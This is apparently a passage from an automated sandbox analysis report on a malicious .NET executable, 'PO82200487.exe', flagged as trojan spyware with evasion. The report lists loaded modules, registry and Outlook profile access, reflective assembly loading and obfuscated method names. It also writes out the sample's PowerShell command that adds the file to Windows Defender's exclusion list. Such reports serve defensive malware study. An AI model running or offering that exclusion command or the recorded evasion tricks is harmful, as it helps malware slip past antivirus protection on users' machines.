                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C356800_2_00C35680
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C356700_2_00C35670
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C358600_2_00C35860
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C358700_2_00C35870
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C35AF00_2_00C35AF0
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C35B000_2_00C35B00
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C39D780_2_00C39D78
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_07EFB3200_2_07EFB320
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_07EF92500_2_07EF9250
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_015C41404_2_015C4140
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_015C4D584_2_015C4D58
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_015C44884_2_015C4488
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069EA7384_2_069EA738
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069E55684_2_069E5568
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069E1A304_2_069E1A30
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069E22204_2_069E2220
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069EF4F04_2_069EF4F0
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_069ECD004_2_069ECD00
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AF7FA84_2_06AF7FA8
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AF8FE84_2_06AF8FE8
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AF5D904_2_06AF5D90
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AFF2084_2_06AFF208
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AFE2484_2_06AFE248
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AFA9104_2_06AFA910
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AF87304_2_06AF8730
                  Source: PO82200487.exe, 00000000.00000002.1348848708.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000000.1315838734.00000000005AE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOhuYA.exeL vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1357504923.0000000009AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1348848708.0000000002C90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1344826980.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1350373878.0000000004139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO82200487.exe
                  Source: PO82200487.exe, 00000000.00000002.1354931417.0000000007780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO82200487.exe
                  Source: PO82200487.exe, 00000004.00000002.2567205281.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO82200487.exe
                  Source: PO82200487.exe, 00000004.00000002.2567371249.0000000001388000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO82200487.exe
                  Source: PO82200487.exeBinary or memory string: OriginalFilenameOhuYA.exeL vs PO82200487.exe
                  Source: PO82200487.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: PO82200487.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, u9228RTFi7Xn9pJ5U5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, u9228RTFi7Xn9pJ5U5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, QLCIsDidBMb0vV5IRO.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
                  Source: C:\Users\user\Desktop\PO82200487.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO82200487.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmjdok4u.wrt.ps1Jump to behavior
                  Source: PO82200487.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO82200487.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\PO82200487.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PO82200487.exeReversingLabs: Detection: 55%
                  Source: unknownProcess created: C:\Users\user\Desktop\PO82200487.exe "C:\Users\user\Desktop\PO82200487.exe"
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Users\user\Desktop\PO82200487.exe "C:\Users\user\Desktop\PO82200487.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Users\user\Desktop\PO82200487.exe "C:\Users\user\Desktop\PO82200487.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: PO82200487.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO82200487.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, QLCIsDidBMb0vV5IRO.cs.Net Code: qHlL8Bd7l6 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PO82200487.exe.7780000.2.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, QLCIsDidBMb0vV5IRO.cs.Net Code: qHlL8Bd7l6 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PO82200487.exe.4152270.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C313B1 push cs; ret 0_2_00C313B2
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 4_2_06AF1610 push esp; ret 4_2_06AF1611
                  Source: PO82200487.exeStatic PE information: section name: .text entropy: 7.671418587267901
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, LcJlpYHgsuedxhJLcL.csHigh entropy of concatenated method names: 'IysJKxc7bm', 'GNqJEtHrxH', 'ToString', 'nqLJkK6SsW', 'XDrJYXsQmR', 'NXUJSPa6yP', 'PykJlFT0Lx', 'rPeJeIfGRe', 'olrJ9K8I6L', 'sxsJipFZ5J'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, l1y3cbwLxvxoymGwTX.csHigh entropy of concatenated method names: 'kvhenfpAPt', 'xkxeYxMVsn', 'ULUelvMGtU', 'Vd1e9uYVAg', 'wAVeip0QhE', 'FAtlUG5qKt', 'eaEl34G5Ti', 'RhqlNpAcH4', 'JKjlDk7u8B', 'NNeloS8kuB'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, Mot5ucIb1v0EBSaoC4.csHigh entropy of concatenated method names: 'JPJ82XXSu', 'nOlcp6usP', 'zwh0DTQxW', 'pADbCX2IY', 'Hhxg8lZl8', 'AnStdblXP', 'px9U0rMS582hqpWuEQ', 'vmpMLv2GpGtrhTXGIL', 'eNV6Nfv39', 'Ek7RxTOMa'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, L1Mu1S31jbxL2VO3ty.csHigh entropy of concatenated method names: 'SuiJDsTtZJ', 'sHAJ5Nkipl', 'Csi6ZULiAl', 'msZ61E09ym', 'IPrJ41N4xv', 'SyDJOBPDkp', 'FpTJ24qqLS', 'mMZJpjVWHF', 'Tq7J7tCj7M', 'AqrJdNI7FU'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, PTgl33xswMxgXWTFCE.csHigh entropy of concatenated method names: 'hGS9XeyBL9', 'MhV9FaSnNi', 'JHm98peSu2', 'VTn9cL6Pml', 'O8m9WCWbnC', 'vYt90xNJp2', 'mZV9bS3Z8h', 'CAQ9T2Piwc', 'vtg9gmUD73', 'Ace9tDRNGC'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, ex5GLDYDPTZW9AOQkk.csHigh entropy of concatenated method names: 'Dispose', 'gWW1o8MQj5', 'vL5IGCDgUS', 'rCVwWeHCIO', 'iZu15tCcTC', 'MLX1zfITYX', 'ProcessDialogKey', 's3kIZ7rquq', 'nOmI1qLeaM', 'gi1IIUaZJg'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, I89XDPAG2y4SodpBGj.csHigh entropy of concatenated method names: 'pdg9kXKu1u', 'sZ29S4eXWL', 'ufj9eRV9Hf', 'NZae5WKuFE', 'zOvezYsfqN', 'PA79ZwMQnw', 'uCb911h5v5', 'qNY9IZ0dDN', 'omf9f1tHkV', 'vhB9LQ5oBa'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, x5iJJpLb7EC3FK5pqT.csHigh entropy of concatenated method names: 'peh199228R', 'zi71iXn9pJ', 'FMe1KBSd06', 'm1I1EXlF7n', 'jpm1yA4K1y', 'Vcb1CLxvxo', 'FeHKJ9iJZ9pGXELN0O', 'OXet4LOPeCbu4DwoIp', 'sWW11KEXgi', 'pOY1fBEvB8'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, lSSRSyzsnJwErZmQi8.csHigh entropy of concatenated method names: 'dHlR0RnC8e', 'tvtRTZiDT3', 'mXbRgMxX1D', 'X8TRwIAo0v', 'FWJRGhcfgd', 'RbMRPMw6SX', 'YWyRjh64NX', 'c2NRs4dwmw', 'PVFRXxpblY', 'yqsRFPGkcX'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, ODkjB9ppukJOQXQfdx.csHigh entropy of concatenated method names: 'dixyu1EKUU', 'S4dyOo2uuY', 'miwyp6d3Ne', 'jQBy7rFyMT', 'BblyGFVGP0', 'j4KyV4L4ds', 'IOYyPbkfQi', 'QyiyjIhd9C', 'YOHyqQFaXW', 'XfByA4rtqd'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, u9228RTFi7Xn9pJ5U5.csHigh entropy of concatenated method names: 'tSCYpwK4Bw', 'Cg3Y7h4lhU', 'mLUYdeE1MJ', 'teGYHXSdEs', 'G3FYUwTSdH', 'I5sY398yDR', 'aG0YNSv5qn', 'H8fYDvfVfa', 'SDtYoJKAVw', 'UpuY5yTktr'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, IRMb2PSPU11708aH29.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tjhIobEZNx', 'MOyI5VpKXv', 'UgeIzhCmGJ', 'SSBfZGpQph', 'Jksf1t84oZ', 'TXJfI1WihA', 'cMPff07e6b', 'vFfGi5okKuZawqdC4df'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, f7rquqoQOmqLeaMYi1.csHigh entropy of concatenated method names: 'VycBwUHWaX', 'uGUBGqJev5', 'yfCBVjlPB1', 'bsWBPSBbdk', 'K9mBjCOdZ1', 'D8UBqwIhlj', 'xb1BALY93a', 'tWPBm8dBZp', 'jxEBxLaL7n', 'oLHBuAPDiV'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, yNWGmh11eGhmN0lpo9J.csHigh entropy of concatenated method names: 'shGR5jtxaD', 'y9qRzr5j07', 'fA7MZ8QCdc', 'zqGM1htKux', 'GGqMIQIUVF', 'TFpMfbc8wY', 'RMeMLHpefK', 'cdMMn8WSSS', 'UPhMkx3EGi', 'OGWMYDRENX'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, DHidhtgMeBSd06E1IX.csHigh entropy of concatenated method names: 'GhtSc3B4J2', 'x2LS0Q2m8q', 'FgjSTBYREB', 'rJtSgYFgj6', 'IB6Syqt49c', 'ieOSCZPv8I', 'wM4SJaIET3', 'oVqS6CAa2a', 'SyUSBHLnsZ', 'Xc0SRQc8lf'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, dDTjvl1LsKstwierwex.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SMYhBd446n', 'bWphRsdiQL', 'vJFhMZ9BV0', 'DOdhh4rZos', 'MsIhrUIn8r', 'qKBhacKJHv', 'C5PhsDaXBO'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, QLCIsDidBMb0vV5IRO.csHigh entropy of concatenated method names: 'yexfnYUJ1y', 'D3AfkFwl7v', 'IAdfYsghEI', 'xWpfSubo5V', 'BDjflyilbZ', 'tnHfekmZs2', 'UrVf947SiY', 'EMQfihitsr', 'enufvkmsvf', 'PTefKvCKFV'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, nbLgsh1ZVB0wtQ0N8io.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VLSR4hOW0Y', 'IAYROpSGgf', 'JShR2rP6uF', 'TXbRpjyjKN', 'rHqR7toaex', 'IZoRdAKQXv', 'SOiRHKhV4M'
